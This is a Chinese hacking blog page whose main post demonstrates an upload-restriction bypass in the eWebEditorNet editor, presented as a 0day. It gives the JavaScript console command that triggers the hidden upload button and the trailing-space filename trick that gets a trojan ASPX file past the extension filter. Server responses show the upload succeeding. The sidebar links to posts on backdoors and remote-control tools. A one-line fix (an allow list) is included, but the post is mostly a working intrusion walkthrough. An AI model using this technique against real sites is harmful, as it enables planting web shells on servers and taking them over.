-
公告
- 黑夜给了我黑色的眼睛去寻找光明,阳光给了我明亮的眼睛我却是去寻找黑暗,所以我只有在夜里才出现真实的自己。(菩提本不树,明镜亦非台,本来无一物,何处染尘埃。)
-
写作时间
-
原创下载
-
最新文章
- [11/11]代理寻[全功能版]
- [11/11]最新验证HTTP代理【202枚】
- [11/11]中国部分城市HTTP代理20条
- [11/03]Three Eyes v2.1[远程控制]
- [10/30]Connect BackDoor For ShellCode
- [10/30]API函数大全
- [09/04]说一些入侵经验
- [07/05]原来--明星离我们是那么的近。
- [06/14]揭露“冰点暴力强制视频”的骗局
- [06/04]初恋女友与现在女友的区别---注:不是我哈,转载的
- [06/04]最近一段时间的生活
- [05/22]辽宁蛮女(续)
- [05/21]大家看看,这个辽宁的恶心女。
- [05/20]马英九宣誓就职 送陈水扁吕秀莲离开“总统府”
- [05/19]血浓于水!关键时刻,方可知谁是自己人!
-
最新评论
-
文章归档
-
Statistics
- 文章总数:172
- 评论总数:60
- 引用总数:0
- 浏览总数:221449
- 留言总数:0
- 当前样式:4u-HK
- 当前语言:zh-CN
-
友情链接
- 反木马在线
- warhammer gold
- warhammer gold
- 交换友情链接请与QQ:287963907联系.审核非违法网站都可通过!
-
反向链接
eWebEditorNet 漏洞演示[0Day]
{
转载请保留版权信息
PopSky 'S Blog
http://www.popsky.org/
}
当访问eWebEditorNet/Upload.aspx时,可以看到只有浏览,缺少了上传按钮....

不过没关系,在选择好我们要上传的木马以后,直接再在IE当中输入javascript:lbtnUpload.click();回车

上传完毕了,看看返回的原代码...[鼠标右键点查看源文件]
<a id="lbtnUpload" href="javascript:__doPostBack('lbtnUpload','')"></a><script language='javascript'>parent.UploadError('不允许上传此类型的文件!!');</script>
看来上传失败了...做了过滤,限制ASPX的文件上传了.....
继续回到前面,我们在地址后面打一个空格试试

<a id="lbtnUpload" href="javascript:__doPostBack('lbtnUpload','')"></a><script language='javascript'>parent.UploadSavedFinish('20081232115126366.aspx ','jackie.aspx ');history.back();</script>
嘿嘿....绕过了限制......成功的上传了ASPX文件....
文件默认的上传后保存的地址是eWebEditorNet/UploadFile/现在来看看是否上传成功.....

接下来,别再问我还能做什么了,我也不知道.....
总结:
1>
javascript:lbtnUpload.click(); 主语言为javascrypt,向当前页面的lbtnUpload发送一个单击事件...实际上也就相当于我们点了提交按钮,一样的....
2>
脚本里面限制了ASPX为后缀的文件不允许上传,再地址栏后加了一个空格(实际上加别的符号也行,例如 ' ),脚本获取到的文件名就为'aspx ',所以if xxx ='aspx' then 这类型的判断语句就不好使了....修复方法为把不允许改为只允许........


1 Comments , 0 Trackbacks
Jump to comment form | comments rss | Get trackback uri